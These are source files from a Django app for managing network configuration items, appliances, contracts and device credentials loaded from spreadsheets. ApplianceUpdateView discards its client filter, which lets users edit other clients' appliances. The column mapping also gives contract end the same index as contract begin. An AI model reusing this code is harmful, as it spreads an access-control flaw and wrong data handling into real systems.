})\n return kwargs\n\n\nclass CIListView(UserApprovedMixin, ListView):\n model = CI\n paginate_by = 10\n\n def get_queryset(self):\n qs = CI.objects.filter(\n status=self.kwargs['status'],\n place__client=self.request.user.client\n )\n if self.request.user.is_superuser:\n qs = CI.objects.filter(status=self.kwargs['status'])\n\n return qs\n\n\nclass CIDetailView(UserApprovedMixin, DetailView):\n model = CI\n queryset = CI.objects.select_related('place', 'contract')\n\n def get_object(self, **kwargs):\n object = super().get_object(**kwargs)\n if not 
self.request.user.is_superuser:\n if object.place.client != self.request.user.client:\n # user authenticated but unauthorized\n raise Http404\n # user authenticated and authorized\n return object\n\n\nclass ManufacturerDetailView(UserApprovedMixin, DetailView):\n model = Manufacturer\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n qs = Appliance.objects.filter(\n manufacturer=context['manufacturer'],\n client=self.request.user.client,\n )\n if self.request.user.is_superuser:\n qs = Appliance.objects.filter(manufacturer=context['manufacturer'])\n context['num_appliances'] = qs.count()\n\n return context\n\n\nclass ApplianceListView(UserApprovedMixin, ListView):\n model = Appliance\n paginate_by = 10\n\n def get_queryset(self):\n qs = Appliance.objects.filter(client=self.request.user.client)\n if self.request.user.is_superuser:\n qs = super().get_queryset()\n return qs\n\n\nclass ApplianceCreateView(UserApprovedMixin, SuccessMessageMixin, AddClientMixin, CreateView):\n model = Appliance\n form_class = ApplianceForm\n success_message = \"The appliance %(serial_number)s was created successfully.\"\n\n\nclass ApplianceUpdateView(UserApprovedMixin, SuccessMessageMixin, UpdateView):\n model = Appliance\n form_class = ApplianceForm\n success_message = \"The appliance was updated successfully.\"\n\n def get_queryset(self):\n qs = Appliance.objects.select_related('client', 'manufacturer')\n if not self.request.user.is_superuser:\n qs.filter(client=self.request.user.client)\n return qs\n\n@login_required\ndef ci_upload(request):\n if not request.user.is_approved: raise PermissionDenied()\n\n result = None\n form = UploadCIsForm()\n\n if request.method == 'POST':\n form = UploadCIsForm(request.POST, request.FILES)\n if form.is_valid():\n client = request.user.client\n result = CILoader(request.FILES['file'], client).save()\n\n return render(request, 'cis/ci_upload.html', {\n 'form': form,\n 'result': result\n })\n\n\n@login_required\ndef send_ci_pack(request):\n if not request.user.is_approved: raise PermissionDenied()\n\n if request.method == 'POST':\n try:\n pack = CIPack.objects.create(responsible=request.user)\n ci_pks = request.POST.getlist('cis_selected')\n if ci_pks:\n pack.send_to_production(ci_pks)\n messages.success(request, ngettext(\n 'The selected CI was sent to production successfully.',\n 'The selected CIs were sent to production successfully.',\n len(ci_pks)\n ))\n else:\n messages.error(request, 'Please select at least one item to be sent to production.')\n except DatabaseError:\n raise DatabaseError('There was an error during the sending of the CIs to production.')\n\n return redirect('cis:ci_list', status=0)\n" }, { "alpha_fraction": 0.5890411138534546, "alphanum_fraction": 0.6164383292198181, "avg_line_length": 17.25, "blob_id": "e716397b76b3dbfd582deb840b7fc5c13d1afb4b", "content_id": "e1c305d63062104565bf29975a1f26f60ba80a42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 146, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/templates/homepage.html", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "{% extends \"base_generic.html\" %}\n\n{% block title %}Homepage{% endblock %}\n\n{% block content %}\n<h1 class=\"h5 my-4\">Homepage</h1>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.6267281174659729, "alphanum_fraction": 0.6336405277252197, "avg_line_length": 16.360000610351562, "blob_id": 
"dfda00c5873c2395ac9dfe837941e252926c6028", "content_id": "ca2ad59678e7a68389dd738e890e12dbf1026d97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 434, "license_type": "no_license", "max_line_length": 38, "num_lines": 25, "path": "/Pipfile", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "[[source]]\nurl = \"https://pypi.python.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nopenpyxl = \"*\"\nDjango = \"*\"\ndjango-crispy-forms = \"*\"\ndjango-extensions = \"*\"\npsycopg2-binary = \"*\"\ndjango-allauth = \"*\"\ndjango-fernet-fields = \"*\"\ngunicorn = \"*\"\ndjango-heroku = \"*\"\nwhitenoise = \"*\"\ndjango-debug-toolbar = \"*\"\ndjango-permissions-policy = \"*\"\n\n[dev-packages]\nselenium = \"*\"\ncoverage = \"*\"\n\n[requires]\npython_version = \"3.8\"\n" }, { "alpha_fraction": 0.5667429566383362, "alphanum_fraction": 0.5667429566383362, "avg_line_length": 27.5, "blob_id": "09fedf43fab850e1760ffa18a61ba9bd345ef3f7", "content_id": "192bff18f01d269684edd1d54e8b8c9edf6f2efc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 94, "num_lines": 46, "path": "/accounts/admin.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.translation import gettext, gettext_lazy as _\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import User\n\n\[email protected](User)\nclass CustomUserAdmin(UserAdmin):\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n list_select_related = ('client',)\n list_display = (\n 'username',\n 'email',\n 'client',\n 'is_superuser',\n 'is_staff',\n 'is_active',\n 'date_joined',\n 'last_login',\n 'is_approved',\n )\n list_filter = (\n 'last_login',\n 'is_superuser',\n 'is_staff',\n 'is_active',\n 'date_joined',\n 'client',\n )\n\n fieldsets = (\n (None, {'fields': ('username', 'password')}),\n (_('Client'), {'fields': ('client',)}),\n (_('Personal info'), {'fields': ('first_name', 'last_name', 'email')}),\n (_('Permissions'), {\n 'fields': ('is_active', 'is_staff', 'is_superuser', 'groups', 'user_permissions'),\n }),\n (_('Important dates'), {'fields': ('last_login', 'date_joined')}),\n )\n\n @admin.display(boolean=True, description='Approved')\n def is_approved(self, obj):\n return obj.is_approved\n" }, { "alpha_fraction": 0.7092198729515076, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 19.14285659790039, "blob_id": "17caa3de9c251e4287b06795202370a4b8aac626", "content_id": "581752324fb4fb62d5283478903ed1d3eadca564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 705, "license_type": "no_license", "max_line_length": 71, "num_lines": 35, "path": "/cis/cis_mapping.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "\"\"\"\nField names and their column location (zero-indexed) on the spreadsheet\n\"\"\"\n\nCIS_SHEET = 'cis'\n# Fields in \"cis\" sheet\nHOSTNAME = 0\nIP = 1\nDESCRIPTION = 2\nDEPLOYED = 3\nBUSINESS_IMPACT = 4\n\n# Site fields in \"cis\" sheet\nPLACE = 5\nPLACE_DESCRIPTION = 6\n\n# Contract fields in \"cis\" sheet\nCONTRACT = 7\nCONTRACT_BEGIN = 8\nCONTRACT_END = 8\nCONTRACT_DESCRIPTION = 10\n\n# Credential fields in \"cis\" sheet\nCREDENTIAL_USERNAME = 11\nCREDENTIAL_PASSWORD = 
12\nCREDENTIAL_ENABLE_PASSWORD = 13\nCREDENTIAL_INSTRUCTIONS = 14\n\n# Appliances fields in \"appliances\" sheet\nAPPLIANCES_SHEET = 'appliances'\nAPPLIANCE_HOSTNAME = 0\nAPPLIANCE_SERIAL_NUMBER = 1\nAPPLIANCE_MANUFACTURER = 2\nAPPLIANCE_MODEL = 3\nAPPLIANCE_VIRTUAL = 4\n" }, { "alpha_fraction": 0.6056187152862549, "alphanum_fraction": 0.6069054007530212, "avg_line_length": 38.51694869995117, "blob_id": "9c35ba623ed0396002f7bb5993be08094c3b8e01", "content_id": "46104bd6e009be449ba3273b8ab9791abdd5fcd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4663, "license_type": "no_license", "max_line_length": 92, "num_lines": 118, "path": "/cis/loader.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "import logging\n\nfrom collections import namedtuple\nfrom openpyxl import load_workbook\nfrom django.db import IntegrityError, transaction\nfrom typing import Set\n\nfrom .models import Client, Place, CI, Appliance, Contract, Manufacturer\nfrom .cis_mapping import HOSTNAME, IP, DESCRIPTION, \\\n DEPLOYED, BUSINESS_IMPACT, PLACE, PLACE_DESCRIPTION, CONTRACT, \\\n CONTRACT_BEGIN, CONTRACT_END, CONTRACT_DESCRIPTION, CREDENTIAL_USERNAME, \\\n CREDENTIAL_PASSWORD, CREDENTIAL_ENABLE_PASSWORD, CREDENTIAL_INSTRUCTIONS, \\\n CIS_SHEET, APPLIANCES_SHEET, APPLIANCE_HOSTNAME, APPLIANCE_SERIAL_NUMBER, \\\n APPLIANCE_MANUFACTURER, APPLIANCE_MODEL, APPLIANCE_VIRTUAL\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CILoader:\n def __init__(self, file, client: Client):\n self._workbook = load_workbook(file, read_only=True, data_only=True)\n self.client = client\n self.places = {}\n self.contracts = {}\n self.manufacturers = {}\n self.cis = []\n self.errors = []\n\n def save(self):\n cis_sheet = self._workbook[CIS_SHEET]\n logger.info(f'The method save() of the class {self.__class__.__name__} was called.')\n\n Error = namedtuple('Error', ['exc', 'row'])\n for row in cis_sheet.iter_rows(min_row=2, values_only=True):\n try:\n with transaction.atomic():\n ci = self._create_ci(row)\n ci.appliances.set(self._get_ci_appliances(row[HOSTNAME]))\n self.cis.append(ci)\n logger.info(f'{ci} was added to self.cis')\n except IntegrityError as e:\n self.errors.append(Error(e, row))\n logger.error(f'{e} spreadsheet row: {row} was added to self.errors')\n return self\n\n def _create_ci(self, row: tuple) -> CI:\n return CI.objects.create(\n client=self.client,\n hostname=row[HOSTNAME],\n ip=row[IP],\n description=row[DESCRIPTION],\n deployed=bool(row[DEPLOYED]),\n business_impact=self._get_business_impact(row[BUSINESS_IMPACT]),\n place=self._get_place(row[PLACE], row[PLACE_DESCRIPTION]),\n contract=self._get_contract(row),\n username=row[CREDENTIAL_USERNAME],\n password=row[CREDENTIAL_PASSWORD],\n enable_password=row[CREDENTIAL_ENABLE_PASSWORD],\n instructions=row[CREDENTIAL_INSTRUCTIONS],\n )\n\n def _get_ci_appliances(self, hostname: str) -> Set[Appliance]:\n appliances = set()\n appliances_sheet = self._workbook[APPLIANCES_SHEET]\n for appl_row in appliances_sheet.iter_rows(min_row=2, values_only=True):\n if appl_row[APPLIANCE_HOSTNAME] == hostname:\n appliances.add(self._get_appliance(appl_row))\n return appliances\n\n def _get_place(self, name: str, description: str) -> Place:\n if name in self.places:\n return self.places[name]\n else:\n self.places[name] = Place.objects.get_or_create(\n name=name,\n description=description,\n client=self.client\n )[0]\n return self.places[name]\n\n def _get_contract(self, row: tuple) -> Contract:\n 
contract_name = row[CONTRACT]\n if contract_name in self.contracts:\n return self.contracts[contract_name]\n else:\n self.contracts[contract_name] = Contract.objects.get_or_create(\n description=row[CONTRACT_DESCRIPTION],\n name=contract_name,\n begin=row[CONTRACT_BEGIN],\n end=row[CONTRACT_END],\n )[0]\n return self.contracts[contract_name]\n\n def _get_appliance(self, row) -> Appliance:\n appliance = Appliance.objects.get_or_create(\n client=self.client,\n serial_number=row[APPLIANCE_SERIAL_NUMBER],\n manufacturer=self._get_manufacturer(row[APPLIANCE_MANUFACTURER]),\n model=row[APPLIANCE_MODEL],\n virtual=bool(str(row[APPLIANCE_VIRTUAL]).strip())\n )[0]\n return appliance\n\n def _get_manufacturer(self, name: str) -> Manufacturer:\n if name in self.manufacturers:\n return self.manufacturers[name]\n else:\n self.manufacturers[name] = Manufacturer.objects.get_or_create(\n name=name,\n )[0]\n return self.manufacturers[name]\n\n @staticmethod\n def _get_business_impact(business_impact: str) -> int:\n model_choices = dict(CI.IMPACT_OPTIONS).items()\n options = {value: key for key, value in model_choices}\n return options.get(business_impact.lower())\n" } ]
21
KyleGrier/self-driving
https://github.com/KyleGrier/self-driving
10cf9bd01b496961cd2e478bb9aa3fff935944cd
19abb3eaf3218068184173d5ca273c74ff0e3e72
997785f6905727526b1d6bb30660b88dd634f5ea
refs/heads/master
2021-01-16T00:09:28.183732
2018-04-21T22:27:11
2018-04-21T22:27:11
99,946,120
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6594318747520447, "alphanum_fraction": 0.6806991696357727, "avg_line_length": 33.84771728515625, "blob_id": "6a96222c7e4f9c9b120890ff51ab96dba4c595c6", "content_id": "dafeb594677efb70b23f0a4ba576b8aa995dd994", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6865, "license_type": "no_license", "max_line_length": 205, "num_lines": 197, "path": "/CarND-Vehicle-Detect/pipeline.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "from helper import *\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nimport matplotlib.gridspec as gridspec\nfrom skimage.feature import hog\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nimport glob\nimport time\nfrom scipy.ndimage.measurements import label\n\norient = 11\npix_per_cell = 16\ncell_per_block = 2\ncspace = 'YUV'\nsig = \"_ori\"+ str(orient)+ \"_pix\" + str(pix_per_cell) + \"_cell_per_block\"\nclf = None\nscaler = None\ntest_image = \"test_images/test6.jpg\"\ntest_images = [\"test_images_png/test0.png\", \"test_images_png/test1.png\", \"test_images_png/test2.png\", \"test_images_png/test3.png\", \"test_images_png/test4.png\", \"test_images_png/test5.png\", \"messigray.png\"]\n\ndef saveFeatures(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace):\n\n\tstart = time.time()\n\n\tcars, notcars = getData()\n\tstart = time.time()\n\tcar_features = extract_features(cars, cspace=cspace,\n\t\t\t\torient = ori, pix_per_cell = pix, cell_per_block = cell)\n\tnotcar_features = extract_features(notcars, cspace=cspace,\n\t\t\t\torient = ori, pix_per_cell = pix, cell_per_block = cell)\n\tX = np.vstack((car_features, notcar_features)).astype(np.float64)\n\ty = np.hstack((np.ones(len(car_features)),\n\t\t\t\t\t\tnp.zeros(len(notcar_features))))\n\n\tsig = \"_ori\"+ str(ori)+ \"_pix\" + str(pix) + \"_cell_per_block\" + str(cell) + \"_cspace_\" + cspace\n\tnp.save(\"feats/X_data{}\".format(sig), X)\n\tnp.save(\"feats/y_data{}\".format(sig), y)\n\n\tend = time.time() - start\n\tprint(\"Saving the features took {} seconds\".format(round(end, 2)))\n\n\n\treturn\n\ndef loadData(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace):\n\tstart = time.time()\n\tsig = \"_ori\"+ str(ori)+ \"_pix\" + str(pix) + \"_cell_per_block\" + str(cell) + \"_cspace_\" + cspace\n\tX = np.load(\"feats/X_data{}.npy\".format(sig))\n\ty = np.load(\"feats/y_data{}.npy\".format(sig))\n\trand_state = np.random.randint(100)\n\tX_train, X_test, y_train, y_test = train_test_split(\n\t\tX, y, test_size=0.1, random_state= 1, stratify=y)\n\n\tend = time.time() - start\n\n\tprint(\"Loading the features took {} seconds\".format(round(end, 2)))\n\n\treturn X_train, X_test, y_train, y_test\n\ndef loadDataFull(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace):\n\tstart = time.time()\n\tsig = \"_ori\"+ str(ori)+ \"_pix\" + str(pix) + \"_cell_per_block\" + str(cell) + \"_cspace_\" + cspace\n\tX = np.load(\"feats/X_data{}.npy\".format(sig))\n\ty = np.load(\"feats/y_data{}.npy\".format(sig))\n\n\tend = time.time() - start\n\n\tprint(\"Loading the features took {} seconds\".format(round(end, 2)))\n\n\treturn X, y\n\ndef 
trainModel(X_train, X_test, y_train, y_test):\n\t# Fit a per-column scaler only on the training data\n\tX_scaler = StandardScaler().fit(X_train)\n\t# Apply the scaler to X_train and X_test\n\tX_train = X_scaler.transform(X_train)\n\tX_test = X_scaler.transform(X_test)\n\t# Use a linear SVC \n\tsvc = LinearSVC(C=0.001)\n\t#svc = SVC(C=10) # best 100 only hog\n\t# Check the training time for the SVC\n\tt=time.time()\n\tsvc.fit(X_train, y_train)\n\tpred = svc.predict(X_test)\n\tt2 = time.time()\n\n\tprint(round(t2-t, 2), 'Seconds to train SVC...')\n\tprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n\ttn, fp, fn, tp = confusion_matrix(y_test, pred).ravel()\n\tprint(\"Percent of False Positives = \", round(fp/len(X_test), 5))\n\tprint(\"Percent of False Negatives = \", round(fn/len(X_test), 5))\n\treturn svc, X_scaler\n\ndef trainModelFull(X, y):\n\t# Fit a per-column scaler only on the training data\n\tX_scaler = StandardScaler().fit(X)\n\t# Apply the scaler to X_train and X_test\n\tX = X_scaler.transform(X)\n\t# Use a linear SVC \n\tsvc = LinearSVC(C=0.001)\n\t#svc = SVC(C=10) # best 100 only hog\n\t# Check the training time for the SVC\n\tt=time.time()\n\tsvc.fit(X, y)\n\tt2 = time.time()\n\n\treturn svc, X_scaler\n\n\nif __name__ == \"__main__\":\n\n\tsaveFeatures(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace)\n\t# X_train, X_test, y_train, y_test = loadData()\n\t# trainModel(X_train, X_test, y_train, y_test)\n\tX, y = loadDataFull()\n\tclf, scaler = trainModelFull(X, y)\n\tframes = []\n\tfor i, img_name in enumerate(test_images):\n\t\timg = plt.imread(img_name)\n\t\theat = np.zeros_like(img[:,:,0]).astype(np.float)\n\n\t\twindows = slide_window(img, x_start_stop=[650, img.shape[1]+20],\n\t\t\ty_start_stop=[380, 650], xy_overlap=(0.65, 0.65))\n\t\twindows2 = slide_window(img, x_start_stop=[650, img.shape[1]+40],\n\t\t\ty_start_stop=[380, 650], xy_overlap=(0.75, 0.75), xy_window=(80, 80))\n\t\twindows3 = slide_window(img, x_start_stop=[650, img.shape[1]+40],\n\t\t\ty_start_stop=[380, 650], xy_overlap=(0.75, 0.75), xy_window=(96, 96))\n\n\t\tt = time.time()\n\t\ton_windows = search_windows(img, windows, clf, scaler,\n\t\t\t\t\t\torient=orient, pix_per_cell=pix_per_cell,\n\t\t\t\t\t\tcell_per_block=cell_per_block, cspace=cspace)\n\t\tt2 = time.time()\n\t\t# print(round(t2-t, 2), 'Seconds to perform search_windows')\n\n\t\tt = time.time()\n\t\ton_windows2 = search_windows(img, windows2, clf, scaler,\n\t\t\t\t\t\torient=orient, pix_per_cell=pix_per_cell,\n\t\t\t\t\t\tcell_per_block=cell_per_block, cspace=cspace)\n\t\tt2 = time.time()\n\t\t# print(round(t2-t, 2), 'Seconds to perform search_windows')\n\n\t\tt = time.time()\n\t\ton_windows3 = search_windows(img, windows3, clf, scaler,\n\t\t\t\t\t\torient=orient, pix_per_cell=pix_per_cell,\n\t\t\t\t\t\tcell_per_block=cell_per_block, cspace=cspace)\n\t\tt2 = time.time()\n\t\t# # print(round(t2-t, 2), 'Seconds to perform search_windows')\n\n\t\tfinal = draw_boxes(img, windows)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}windows\".format(i))\n\n\t\tfinal = draw_boxes(img, windows2)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}windows2\".format(i))\n\n\t\tfinal = draw_boxes(img, windows3)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}windows3\".format(i))\n\n\t\tfinal = draw_boxes(img, on_windows)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}search_windows\".format(i))\n\n\t\tfinal = draw_boxes(img, 
on_windows2)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}search_windows2\".format(i))\n\n\t\tfinal = draw_boxes(img, on_windows3)\n\t\tplt.imshow(final)\n\t\tplt.savefig(\"output_images/{}search_windows3\".format(i))\n\n\t\tsave_on_windows(img, on_windows, 1, i)\n\t\tsave_on_windows(img, on_windows2, 2, i)\n\t\tsave_on_windows(img, on_windows3, 3, i)\n \n\t\theatmap = add_heat(heat, on_windows)\n\t\theatmap = add_heat(heatmap, on_windows2)\n\t\theatmap = add_heat(heatmap, on_windows3)\n\t\theatmap = apply_threshold(heatmap, 2)\n\t\tplt.imshow(heatmap, cmap='hot')\n\t\tplt.savefig(\"output_images/{}heatmap\".format(i))\n\t\tlabels = label(heatmap)\n\t\tdraw_img = draw_labeled_bboxes(np.copy(img), labels)\n\t\tplt.imshow(draw_img)\n\t\tplt.savefig(\"output_images/{}box\".format(i))\n\tprint(\"img{} labels =\".format(i) + str(labels[1]))\n" }, { "alpha_fraction": 0.6052997708320618, "alphanum_fraction": 0.6356613039970398, "avg_line_length": 43.484535217285156, "blob_id": "47c701d7ad64d0aac3d822f760cc7c5535608629", "content_id": "017b631e5b7bc3c3443cfbf32c811b8bc13fa3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12944, "license_type": "no_license", "max_line_length": 125, "num_lines": 291, "path": "/CarND-Advanced-Lane-Lines/helper.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport glob\n\ndef calibrate(img, objpoints, imgpoints):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n undist = cv2.undistort(img, mtx, dist, None, mtx)\n return undist\n\ndef warp(img):\n img_size = (img.shape[1], img.shape[0])\n #Coordinates outlining the lane\n tl_src = [562, 471]\n tr_src = [720, 471]\n br_src = [1088, 720]\n bl_src = [206, 720]\n \n # determine the height and width of the transformed image\n widthA = np.sqrt(((br_src[0] - bl_src[0]) ** 2) + ((br_src[1] - bl_src[1]) ** 2))\n widthB = np.sqrt(((tr_src[0] - tl_src[0]) ** 2) + ((tr_src[1] - tl_src[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n \n heightA = np.sqrt(((tr_src[0] - br_src[0]) ** 2) + ((tr_src[1] - br_src[1]) ** 2))\n heightB = np.sqrt(((tl_src[0] - bl_src[0]) ** 2) + ((tl_src[1] - bl_src[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n \n #Coordinates of the transformed image\n '''\n tl_dst = [0, 0]\n tr_dst = [maxWidth - 1, 0]\n br_dst = [maxWidth - 1, maxHeight - 1]\n bl_dst = [0, maxHeight - 1]\n \n tl_dst = [0, 0]\n tr_dst = [img.shape[1], 0]\n br_dst = [img.shape[1]-1, img.shape[0]-1]\n bl_dst = [0, img.shape[0]-1]\n '''\n tl_dst = [200,270]\n tr_dst = [900,270]\n br_dst = [900,720]\n bl_dst = [200,720]\n src = np.float32(\n [tl_src,\n tr_src,\n br_src,\n bl_src])\n \n dst = np.float32([tl_dst,\n tr_dst, \n br_dst, \n bl_dst])\n \n # Compute the perspective transform\n M = cv2.getPerspectiveTransform(src, dst)\n \n # Compute the inverse perspective transform\n Minv = cv2.getPerspectiveTransform(dst, src)\n \n warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n \n #cv2.polylines(img,np.int32([src]),True,(255,0,0), 5)\n #cv2.polylines(img,np.int32([dst]),True,(0,0,255), 5)\n #f, ax = plt.subplots(1, 1, figsize=(20,10))\n #ax.imshow(img)\n return warped, Minv\n\n\ndef getSobelBinaryX(gray, sobel_kernel = -1, thresh_min = 0, thresh_max=255):\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, 
ksize = sobel_kernel)\n abs_sobelx = np.absolute(sobelx) \n scaled_sobelx = np.uint8(255*abs_sobelx/np.max(abs_sobelx))\n scaled_sobelx = cv2.equalizeHist(scaled_sobelx)\n sxbinary = np.zeros_like(scaled_sobelx)\n sxbinary[(scaled_sobelx >= thresh_min) & (scaled_sobelx <= thresh_max)] = 1\n return sxbinary\n\ndef getSobelBinaryY(gray, sobel_kernel = -1, thresh_min = 0, thresh_max=255):\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize = sobel_kernel)\n abs_sobely = np.absolute(sobely)\n scaled_sobely = np.uint8(255*abs_sobely/np.max(abs_sobely))\n scaled_sobely = cv2.equalizeHist(scaled_sobely)\n sybinary = np.zeros_like(scaled_sobely)\n sybinary[(scaled_sobely >= thresh_min) & (scaled_sobely <= thresh_max)] = 1\n return sybinary\n\ndef getLaplace(gray, thresh_min = 0, thresh_max=255):\n laplace = cv2.Laplacian(gray, cv2.CV_64F)\n abs_laplace = np.absolute(laplace)\n scaled_laplace = np.uint8(255*abs_laplace/np.max(abs_laplace))\n scaled_laplace = cv2.equalizeHist(scaled_laplace)\n lapbinary = np.zeros_like(scaled_laplace)\n lapbinary[(scaled_laplace >= thresh_min) & (scaled_laplace <= thresh_max)] = 1\n return lapbinary\n\ndef getSobelX(gray, sobel_kernel=3):\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize = sobel_kernel) \n abs_sobelx = np.absolute(sobelx) \n return abs_sobelx\n \ndef getSobelY(gray, sobel_kernel=3):\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize = sobel_kernel)\n abs_sobely = np.absolute(sobely)\n return abs_sobely\n \ndef getSobelDirection(gray, sobel_kernel = 3, thresh_min = 0, thresh_max=np.pi/2):\n sobelx = getSobelX(gray, sobel_kernel=sobel_kernel)\n sobely = getSobelY(gray, sobel_kernel=sobel_kernel)\n direction = np.arctan2(sobely, sobelx)\n dirbinary = np.zeros_like(direction)\n dirbinary[(direction >= thresh_min) & (direction <= thresh_max)] = 1\n return dirbinary\n \ndef getSatBinary(s_channel, thresh_min = 150, thresh_max=255):\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= thresh_min) & (s_channel <= thresh_max)] = 1\n return s_binary\n\ndef combineBinary(combined, *binary):\n for b in binary:\n combined[(combined == 1) | (b == 1)] = 1\n return combined\n\ndef getThres(gray, thresh_min = 0, thresh_max=255):\n binary = np.zeros_like(gray)\n binary[(gray >= thresh_min) & (gray <= thresh_max)] = 1\n return binary\n\ndef windSlide(binary_warped):\n # Assuming you have created a warped binary image called \"binary_warped\"\n # Take a histogram of the bottom half of the image\n histogram = np.sum(binary_warped[int(binary_warped.shape[0]/2):,:], axis=0)\n # Create an output image to draw on and visualize the result\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n # Find the peak of the left and right halves of the histogram\n # These will be the starting point for the left and right lines\n midpoint = np.int(histogram.shape[0]/2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n # Choose the number of sliding windows\n nwindows = 9\n # Set height of windows\n window_height = np.int(binary_warped.shape[0]/nwindows)\n # Identify the x and y positions of all nonzero pixels in the image\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Current positions to be updated for each window\n leftx_current = leftx_base\n rightx_current = rightx_base\n # Set the width of the windows +/- margin\n margin = 90\n # Set minimum number of pixels found to recenter window\n minpix = 50\n # Create empty lists to receive 
left and right lane pixel indices\n left_lane_inds = []\n right_lane_inds = []\n # Step through the windows one by one\n for window in range(nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_top = binary_warped.shape[0] - (window+1)*window_height\n win_y_bot = binary_warped.shape[0] - window*window_height\n win_xleft_bot = leftx_current - margin\n win_xleft_top = leftx_current + margin\n win_xright_bot = rightx_current - margin\n win_xright_top = rightx_current + margin\n # Draw the windows on the visualization image\n cv2.rectangle(out_img,(win_xleft_bot,win_y_bot),(win_xleft_top,win_y_top),\n (0,255,0), 2) \n cv2.rectangle(out_img,(win_xright_bot,win_y_bot),(win_xright_top,win_y_top),\n (0,255,0), 2) \n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_top) & (nonzeroy < win_y_bot) & \n (nonzerox >= win_xleft_bot) & (nonzerox < win_xleft_top)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_top) & (nonzeroy < win_y_bot) & \n (nonzerox >= win_xright_bot) & (nonzerox < win_xright_top)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix: \n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n \n # Concatenate the arrays of indices\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n # Extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds] \n\n # Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n \n #fig, ax = plt.subplots()\n 